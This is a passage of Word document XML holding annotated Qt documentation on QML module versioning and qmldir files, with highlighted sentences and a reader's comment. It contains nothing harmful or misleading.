          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type in version 1.0 and a</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MyWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type in version 1.1, you cannot import version 1.2 or version 2.0 of that module.</w:t>
      </w:r>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A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A type can be defined by different files in different versions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In this case, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the most closely matching version</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be used when imported by clients. For example, if a module had specified the following types via its</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00192E15" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="375"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module ExampleModule</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MyButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MyButton</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qml</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MyButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MyButton11</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qml</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MyButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MyButton13</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qml</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MyButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MyButton20</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qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00A82330" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MyRectangle </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MyRectangle12</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00A82330" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a client who imports version 1.2 of ExampleModule will get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MyButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type definition provided by</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MyButton11.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as it is the most closely matching (i.e., latest while not being greater than the import) version of the type, and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MyRectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type definition provided by</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MyRectangle12.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82330" w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different versions of types must be placed in module simultaneously</w:t>
      </w:r>
      <w:r w:rsidR="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00A82330" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">versioning </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system ensures that a given QML file will work regardless of the version of installed software, since a versioned import</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imports types for that version</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, leaving other identifiers available, even if the actual installed version might otherwise provide those identifiers.</w:t>
      </w:r>
      <w:r w:rsidR="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82330" w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Don’t understand </w:t>
      </w:r>
      <w:r w:rsidR="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>last part of the</w:t>
      </w:r>
      <w:r w:rsidR="00A82330" w:rsidRPr="00A82330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sentence… intbu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00192E15" w:rsidRDefault="002C2AE0" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="example-of-a-qmldir-file"/>
      <w:bookmarkStart w:id="360" w:name="_Toc483000608"/>
      <w:bookmarkStart w:id="361" w:name="_Toc483003625"/>
      <w:bookmarkStart w:id="362" w:name="_Toc483603961"/>
      <w:bookmarkStart w:id="363" w:name="_Toc483605181"/>
      <w:bookmarkEnd w:id="359"/>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example of a qmldir File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
      <w:bookmarkEnd w:id="361"/>
      <w:bookmarkEnd w:id="362"/>
      <w:bookmarkEnd w:id="363"/>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">One </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a</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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="37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module ExampleModule</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CustomButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CustomButton</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qml</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CustomButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CustomButton20</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qml</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CustomButton </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CustomButton21</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qml</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plugin examplemodule</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 xml:space="preserve">MathFunctions </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mathfuncs</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js</w:t>
      </w:r>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The above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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file defines a module called "ExampleModule". It defines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CustomButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object type in versions 1.1, 2.0 and 2.1 of the module, with different implementations in each version. It specifies a plugin which must be loaded by the engine when the module is imported by clients, and that plugin may register various C++-defined types with the QML type system. On Unix-like systems the QML engine will attempt to load</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libexamplemodule.so</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as a</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId300" w:history="1">
        <w:r w:rsidRPr="002C2AE0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlExtensionPlugin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and on Windows it will attempt to load</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examplemodule.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as a</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId301" w:history="1">
        <w:r w:rsidRPr="002C2AE0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlExtensionPlugin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Finally,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rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file specifies a</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
